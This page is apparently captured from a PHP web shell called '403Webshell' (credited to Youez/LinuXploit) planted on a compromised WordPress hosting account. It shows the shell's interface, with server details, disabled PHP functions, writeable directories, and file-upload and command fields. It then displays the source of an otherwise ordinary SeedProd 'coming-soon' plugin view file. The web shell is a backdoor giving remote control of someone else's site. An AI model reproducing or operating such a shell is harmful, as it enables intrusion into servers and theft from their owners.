403Webshell
Server IP : 10.19.1.101  /  Your IP : 216.73.216.158
Web Server : Apache
System : Linux web1f13.kinghost.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
User : schererimoveisrs ( 170628)
PHP Version : 7.4.33
Disable Function : apache_child_terminate,c99_buff_prepare,c99_sess_put,dl,exec,leak,link,myshellexec,openlog,passthru,pclose,pcntl_exec,php_check_syntax,php_strip_whitespace,popen,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,show_source,symlink,system,socket_listen,socket_create_listen,putenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/schererimoveisrs/www/wp-content/plugins/coming-soon/resources/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/schererimoveisrs/www/wp-content/plugins/coming-soon/resources/views/importexport.php
<?php
/**
 * Import/export helper view.
 *
 * @package SeedProd
 * @subpackage SeedProd\Views
 */

// phpcs:disable WordPress.Security.NonceVerification.Recommended
$sp_post_id = isset( $_GET['id'] ) ? absint( wp_unslash( $_GET['id'] ) ) : null;
// phpcs:enable WordPress.Security.NonceVerification.Recommended

// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing
$post_json_raw = isset( $_POST['sp_post_json'] ) ? wp_unslash( $_POST['sp_post_json'] ) : '';
$post_json     = sanitize_textarea_field( $post_json_raw );

$nonce_value = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Missing
if ( ! empty( $post_json ) && wp_verify_nonce( $nonce_value, 'importexport-' . $sp_post_id ) ) {
	global $wpdb;
	$json = json_decode( $post_json );
	if ( JSON_ERROR_NONE !== json_last_error() ) {
		wp_die( esc_html__( 'JSON is not valid.', 'coming-soon' ) );
	}

	$json    = wp_json_encode( $json );
	$tablename = $wpdb->prefix . 'posts';
	$updated = $wpdb->update(
		$tablename,
		array(
			'post_content_filtered' => $json,
		),
		array( 'ID' => $sp_post_id ),
		array( '%s' ),
		array( '%d' )
	);

	if ( false === $updated ) {
		echo esc_html__( 'Update error.', 'coming-soon' ) . PHP_EOL;
	} else {
		echo esc_html__( 'Updated.', 'coming-soon' ) . PHP_EOL;
	}
}

global $wpdb;
$tablename = $wpdb->prefix . 'posts';
$sql       = "SELECT * FROM $tablename";
$sql      .= " WHERE ID = %s";
$safe_sql  = $wpdb->prepare( $sql, $sp_post_id ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
$result    = $wpdb->get_row( $safe_sql ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared

$js = json_decode( $result->post_content_filtered );
if ( JSON_ERROR_NONE === json_last_error() ) {
	echo esc_html__( 'JSON is valid.', 'coming-soon' ) . PHP_EOL;
} else {
	echo esc_html__( 'JSON is not valid.', 'coming-soon' ) . PHP_EOL;
}

?>
<form method="post">
	<?php wp_nonce_field( 'importexport-' . $sp_post_id ); ?>
	<h1><?php esc_html_e( 'Post JSON', 'coming-soon' ); ?></h1>
	<textarea name="sp_post_json" style="width:100%; height: 500px;"><?php echo esc_textarea( $result->post_content_filtered ); ?></textarea>
	<input type="submit" class="button button-primary" value="<?php esc_attr_e( 'Save', 'coming-soon' ); ?>">
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit